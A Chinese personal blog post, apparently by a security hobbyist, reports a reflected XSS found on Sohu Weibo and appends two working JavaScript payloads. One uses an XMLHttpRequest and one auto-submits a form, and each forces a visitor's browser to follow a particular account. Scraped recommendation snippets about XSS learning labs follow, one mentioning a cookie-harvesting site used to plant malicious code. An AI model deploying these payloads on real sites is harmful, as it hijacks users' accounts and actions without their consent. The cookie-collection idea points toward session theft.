http://www.wooyun.org/bugs/wooyun-2010-010041
这是今天忙活了下的结果。发现了个比较鸡肋的反射型xss
另外还学习了sina app的应用,果然比较爽,各种自己的js文件,在线编辑,非常方便。
此外下次blog的任务是
http://www.inbreak.net/archives/389
空虚浪子心的blog非常cool
附录是两个搜狐微博加关注的js脚本
var xmlHttp=null;
function createXMLHttpRequest()
{
if(xmlHttp == null){
if(window.XMLHttpRequest) {
//Mozilla 浏览器
xmlHttp = new XMLHttpRequest();
}else if(window.ActiveXObject) {
// IE浏览器
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
}
}
function openAjax()
{
if( xmlHttp == null)
{
createXMLHttpRequest();
if( xmlHttp == null)
{
//alert('出错');
return ;
}
}
xmlHttp.onreadystatechange=xmlHttpChange;
xmlHttp.open("post","/follow/addfollows",true);
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
xmlHttp.setRequestHeader("X-Requested-With","XMLHttpRequest");
xmlHttp.send("act=follow&friendids=595824670&type=follow7");
}
function xmlHttpChange()
{
if(xmlHttp.readyState==4)
{
if(xmlHttp.status==200)
{
}
}
}
openAjax();
传统的js加form提交型
var act = 'follow';
//it's icefish冰's weibo
//act=follow&friendids=595824670&type=follow7
var friendids = '595824670';
var type='follow7';
var sohuAddFollowForm = document.createElement("form");//表单对象
sohuAddFollowForm.method="post" ;
sohuAddFollowForm.action = '/follow/addfollows' ;
var actInput = document.createElement("input") ; //
actInput.setAttribute("name", "act") ;
actInput.setAttribute("value", act);
sohuAddFollowForm.appendChild(actInput) ;
var friendidsInput = document.createElement("input");//
friendidsInput.setAttribute("name","friendids");
friendidsInput.setAttribute("value",friendids);
sohuAddFollowForm.appendChild(friendidsInput);
var typeInput = document.createElement("input");//
typeInput.setAttribute("name","type");
typeInput.setAttribute("value",type);
sohuAddFollowForm.appendChild(typeInput);
document.body.appendChild(sohuAddFollowForm) ;
sohuAddFollowForm.submit() ;
document.body.removeChild(sohuAddFollowForm) ;
分享到:
相关推荐
* kali机器上搭建搜集cookie网站,访问xss漏洞网站挂马 * 编写搜集cookie的代码,收集用户的cookie信息 这只是xss跨站脚本攻击的一些基本知识点和实践案例,更多的信息和技术细节需要进一步学习和研究。
为了学习和研究XSS漏洞,XSS-Labs是一个优秀的实践平台,它提供了多种不同类型的XSS挑战,帮助安全从业者提升检测和防御XSS攻击的能力。 **XSS-Labs安装步骤** 1. **下载靶场文件**:首先,你需要找到XSS-Labs的...
### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时,嵌入其中的...
【WebGoat学习笔记】 WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻击手段,...
网络安全学习笔记包含sql注入,ssh暴力破解,web漏洞扫描,xss扩展攻击,文件上传攻击等
通过审查代码,可以发现潜在的SQL注入、XSS、文件包含和其他安全问题。确保所有用户输入都经过适当的验证和过滤,避免使用不安全的函数,并遵循安全编码最佳实践。 7. 日志分析: 日志分析对于网络安全至关重要,...
"Web 安全学习笔记" Web 安全学习笔记是关于网络安全的综合性学习笔记,涵盖了 Web 安全的基础知识、常见威胁、防御策略等方面的内容。下面将详细介绍该笔记中所涉及的知识点: 一、Web 安全基础 * Web 安全定义...
它包含了SQL注入、跨站脚本(XSS)、盲注等漏洞类型。在Linux系统上,可以通过`yum install`快速搭建LAMP环境,安装Apache(httpd)、MySQL Server、MySQL客户端、PHP以及PHP的GD库,为部署DVWA做好准备。 **实战...
通过深入研究这个XSS平台的源码,安全专家可以了解XSS漏洞的工作原理,学习如何检测和防御此类攻击,同时也可以定制自己的XSS测试工具,提升网络安全防护能力。对于开发者而言,理解和防范XSS漏洞是构建安全Web应用...
6. 实战演练:可能包含一些练习或项目,让学习者有机会亲手处理XSS漏洞,提升实战技能。 7. 最新趋势:讨论最新的XSS攻击手段和防护技术,以保持学习者的知识与时俱进。 通过这份教程,无论是初级还是高级的Web...
以下是对"php常见漏洞及编码安全"主题的详细解释,以及如何防范这些安全问题。 1. SQL注入:SQL注入是最常见的PHP漏洞之一,发生在开发者未对用户输入的数据进行充分过滤或转义时。攻击者可以通过构造恶意的SQL语句...
- **安全最佳实践**:学习如何避免常见的安全漏洞,如CSRF、XSS等,以及如何进行安全配置优化。 这个"shiro学习笔记"涵盖了Shiro的基本使用到高级特性,通过学习,你将能够熟练地运用Shiro来保障你的Web应用的安全...
其次,安全方面,一个比较安全的文章管理系统应具备防止SQL注入、XSS攻击(跨站脚本攻击)和其他常见web漏洞的机制。在ASP代码中,这通常意味着对用户输入进行适当的验证和清理,使用参数化查询来避免SQL注入,以及...
OpenRASP适用于各种Java Web应用,如电商平台、金融系统、企业内部应用等,能够有效防止SQL注入、XSS跨站脚本、文件上传漏洞等常见攻击,同时还可以自定义规则,适应特定业务场景下的安全需求。 总结来说,...
《Web安全学习笔记》 在当今数字化的时代,Web安全已经成为每一个互联网用户,特别是开发者和网络安全专业人员必须关注的重要领域。Web安全主要涉及保护Web应用程序免受各种攻击,如SQL注入、跨站脚本(XSS)、跨站...
**WEB漏洞-RCE代码及命令执行漏洞全解** 在Web应用程序的开发过程中,为了实现功能的多样性与便捷性,程序员常常会使用代码调用或命令执行功能。然而,这种做法也可能带来严重的安全风险,即代码执行(RCE,Remote ...
总的来说,这份学习笔记提供了从基础到进阶的Python Web安全知识体系,适合对Web安全感兴趣或者希望提升自己安全技能的开发者。通过深入学习和实践,你不仅可以理解Web安全的原理,还能掌握实际的防护和攻击技巧。
《Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...
此外,还可以结合其他安全策略,如使用Content Security Policy(CSP)限制脚本的来源,使用XSS Filter阻止跨站脚本攻击,以及对所有用户输入进行严格的服务器端验证和过滤。同时,定期更新浏览器和补丁,确保系统...
- **XSS漏洞**: - **类型**:存储型、反射型。 - **攻击手段**:利用恶意脚本存储在服务器或通过链接传递给用户。 #### 总结 广州大学软件安全期末复习笔记详细介绍了软件安全领域的关键知识点,包括但不限于...